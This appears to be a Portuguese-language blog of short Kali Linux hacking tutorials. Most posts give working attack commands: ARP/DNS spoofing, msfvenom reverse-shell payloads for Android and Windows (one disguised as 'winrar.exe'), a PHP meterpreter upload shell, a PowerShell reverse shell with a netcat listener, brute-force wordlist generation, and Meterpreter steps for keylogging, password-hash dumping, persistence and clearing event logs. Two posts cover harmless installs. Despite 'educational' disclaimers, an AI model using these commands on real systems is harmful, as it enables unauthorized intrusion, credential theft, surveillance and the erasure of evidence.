DnsSpoof e ArpSpoof kali Linux

0

Boas Users!

Vamos falar um pouco hoje de dnsspoof e arpspoof,  técnica utilizada em redes cabeadas e wireless que permite ao atacante capturar informações

Comandos:

# arpspoof -i eth0 -t 192.168.1.119 -r 192.168.1.120
# dnsspoof -i eth0
# dnsspoof -i eth0 -f dns.txt

Isso foi uma pequena demostração  do que o dnsspoof e arpspoof é capaz de fazer.

 

By user777

 

 

Exploit Android 6 usando MSFvenom (Kali 2.2016)

0

Gente, nesse video eu mostro como com poucos comandos você pode explorar um Android na versão 6.0.
O video não tem intenção de ensinar ou induzir ninguém a invadir a privacidade de terceiros, mas sim demonstrar que falhas podem ser exploradas.

Usei apenas o msfvenom sem opções de encoder, arquitetura ou outros, basicamente apenas um exploit gerado pelo kali e que me deu acesso de forma reversa ao Android.
Aparelho : Moto G segunda Geração com android 6.0 com ultima atualização de segurança instalado.

Comandos usado neste video…
Criar o exploit, substitua ip pelo seu ip, porta pela devida porta e de o nome do app:
msfvenom -p android/meterpreter/reverse_tcp LHOST=IP LPORT=PORTA -o app.apk

Para estabelecer conexão :
msfconsole

use multi/handler

set payload android/meterpreter/reverse_tcp

set lhost IP_KALI

set lport porta

exploit -j ou run ou somente exploit

Bom, por hoje é só, logo mais mostro como deixar este exploit como algo que inicia todas as vezes que o dispositivo for ligado, obtendo assim um acesso monstro ao Android….rsrs
abraços

 

 

 

Gerando wordlist com crunch (kali linux)

0

Boas Users!

Aproveitando o belíssimo post do nosso amigo Thiago, sobre ataque de força bruta com o Hydra, vou mostrar como gerar sua própria wordlist.

“Todas as informações aqui devem ser usadas para fins educacionais e que a invasão de dispositivos não autorizado é crime”

 

Parâmetros do crunch:

$ sudo crunch 4 6 1234567890 -o /diretório/arquivo.lst

sudo= Permissão de super usuário

crunch= Gerador de wordlist

4= Mínimo de caracteres

6= Máximo de caracteres

1234567890= Números a serem gerados em ordens aleatória

-o= Faz com que em vez de serem apresentado no monitor os resultados dos nossos comandos, estes são escritos num ficheiro adicionados pelo parâmetro.

/diretório= Local onde será salvo o arquivo

$ sudo crunch 9 9 1234567890 -t maria@@@@ -o /diretório/arquivo.lst

-t= Inseri uma patente e modifica como entendermos. Sabemos que uma password é composta de um nome, neste caso maria mas de seguida é inserido 4 dígitos que não sabemos.

$ sudo crunch 9 9 1234567890 -t @@@@maria -o /diretório/arquivo.lst

Podemos inverter também, a sintaxe “maria@@@@”

$ sudo crunch 4 8 -f /usr/share/crunch/charset.lst mixalpha -o /diretório/arquivo.txt

Veja que nesse parâmetro do crunch, apliquei uma geração com o “charset”, uma wordlist ja pré-determinada, como “mixalpha” (letras maiúsculas e minúsculas).

Aqui foram alguns dos comandos e parâmetros do crunch, saiba mais aqui.

 

By user777

Solução para o erro “Nenhuma unidade de CD-ROM comum foi detectada” Kali linux

0

Boas Users!

 

Diante do erro “Nenhuma unidade de CD-ROM comum foi detectada” a resolução é:

erro kali

 

1– esse erro ocorre geralmente, com pendrive.

2– ao aparecer essa tela de erro, retire o pendrive e coloque novamente e pressione enter.

3– se o erro permanecer, retire o pendrive novamente, sem desligar ou reiniciar o computador.

4– se estiver no windows, use o Daemon Tools para emular a ISO (se for windows 10 ele ja emula dando um duplo clique na ISO), formate o pendrive clicando com botão direito, e depois copie os arquivos de dentro da ISO para o pendrive, ao terminar, plugue novamente no computador que está sendo instalado o kali, e pressione enter novamente.

5–  se estiver no linux, Primeiro acesse o terminal como root:

su

Agora vamos acessar o /media:

# cd /media

E então crie um diretório onde deverá ser armazenado a nossa ISO:

# mkdir /diretorio_ISO

Agora é fácil montar a imagem .ISO, basta usar o comando abaixo. O comando “mount” que irá montar o nome da sua imagem ISO sem as aspas, o local onde está seu diretório para armazenar a ISO, o parâmetro “-o” como opção de montar tudo no fstab e o loop que executa o mount até o fim da ISO:

# mount “sua_Imagem.iso” /media/diretorio_ISO -o loop

 

 

By user777

Invadindo com Power Shell kali Linux

0

Boas Users!

Vou demonstrar mais uma vulnerabilidade “sistemas Windows”

“Todas as informações aqui devem ser usadas para fins educacionais e que a invasão de dispositivos não autorizado é crime”

 

Comandos Utilizados:

# apt-get install npm build-essential g++ xsel
# npm install -g n
# npm config set registry http://registry.npmjs.org/
# n latest
# git clone https://github.com/gabemarshall/Brosec.git

git clone = Faz o download do Brosec

# cd Brosec && npm install

cd Brosec && npm install = Entra no diretório Brosec e instala p npm

# ./bros

./bros = Iniciando o script

# set LHOST (seu IP)

LHOST = IP do atacante

# set LPORT 4444

LPORT = Porta utilizada

# 5

5 = Miscellaneos que significa “Variado”

# 1

1 = Reverse shell

# 4

4 = Reverse Shell PSH

# N

N = “Não” “Should I start a tcp listener on port for you”

# netcat -lnp 4444 -vv

Iniciando o serviço

 

Fonte: https://github.com/gabemarshall/Brosec

 

By user777

 

 

 

 

Explorando Vulnerabilidade de “upload” com BURP “kali linux”

0

Boas users!

Irei mostrar como explorar uma vulnerabilidade, de um determinado servidor de upload com o BURP.

Comando:

# msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.108 LPORT=4444 -e      php/base64 -f raw > /root/upload.php

By user777

 

Hackeando as Credenciais do facebook “setoolkit” kali linux

0

Boas Users!

Irei repassar uma forma de pegar, as credenciais do facebook com uma ferramenta chamda “setoolkit”.

“Todas as informações aqui devem ser usadas para fins educacionais e que a invasão de dispositivos não autorizado é crime”

 

Bem pessoal, essa foi uma pequena demonstração de como estamos vulneráveis, com
Participação do nosso amigo Thiago!!!!

By user777

 

 

Trace Mobile Kali Linux

0

Boas users!

 

Hoje estarei Disponibilizando um script em perl, para rastrear um IP mobile.

 

Link for perl – http://goo.gl/4ptqDk

By user777

Instalando Teamviewer no Kali Linux

0

Boas Users!

Hoje vou ensinar como instalar o famoso Teamviewer no kali linux, vamos la!

#dpkg --add-architecture i386

1

#apt-get update

 

#wget -c https://download.teamviewer.com/download/teamviewer_i386.deb

 

 

#dpkg -i teamviewer_11.0.57095_i386.deb

2

#apt-get -f install

1

Pronto pessoal, assim finalizamos a instalação!

 

By user777

Invadindo Computador com kali Linux

5

Boas Users!

Antes de mais nada um recadinho;

“Todas as informações aqui devem ser usadas para fins educacionais e que a invasão de dispositivos não autorizado é crime”

OBS: ao criar o arquivo “.exe” do backdoor, tem que ser executado no computador com  windows.

Comandos executados no video;

$ sudo msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.101 lport=4444
-f exe -o /root/Downloads/winrar.exe

sudo = Privilegio de super usuário, ja que eu executei os comandos como usuário comum OBS: se utilizar o usuário “root” não precisa do “sudo”

windows/meterpreter/reverse_tcp= MeterPreter é um interpretador de comandos do metasploit framework.

msfvenom= para criar o nosso backdoor

-p= Payload “refere-se à parte de um vírus de computador que executa uma ação nociva”

lhost= o seu IP local do kali

lport= porta que vai ser executada

-f= format “formato do arquivo que criamos no caso foi exe”

-o= out “saída”

/root/Downloads= caminho que salvei o arquivo

winrar.exe= nome dado ao payload, pode-se dar qualquer nome ao seu payload, mas sempre com a extensão “exe”

$ sudo msfconsole

msfconsole= iniciando o modulo do programa

use exploit/multi/handler

use exploit/multi/handler= Carregando módulo a ser usado

set payload windows/meterpreter/reverse_tcp

set payload windows/meterpreter/reverse_tcp= método utilizado

set lhost

set lhost= inserir o ip do kali

set lport

set lport= inserir a porta a ser utilizada

exploit

exploit = execução do backdoor

 

Seguem-se agora algumas opções:

sysinfo – esse comando vai mostrar qual a versão do windows da máquina alvo.

getsystem – Eleva o nível de privilégio para SYSTEM

ipconfig – Mostra o endereço ip da máquina alvo

screenshot – Salva um arquivo JPEG com um print da tela do computador alvo

keyscan_start – Inicia o keylogger ou seja captura tudo que for digitado no teclado do computador alvo

keyscan_dump – Visualiza os dados capturados após o keyscan_start.

keyscan_stop – Para a captura

run persistence -X – Esse comando configura a máquina alvo para que a cada boot no sistema ela estabeleça novamente a conexão com a máquina atacante.

hashdump – faz a captura do hash de senhas do computador alvo.

execute – Executa um aplicativo ex. execute -f calc.exe

shell – Abre um prompt de comando

clearev – Limpa os logs de eventos do Windows, ou seja, apaga possíveis rastros deixados por vc.

 

By user777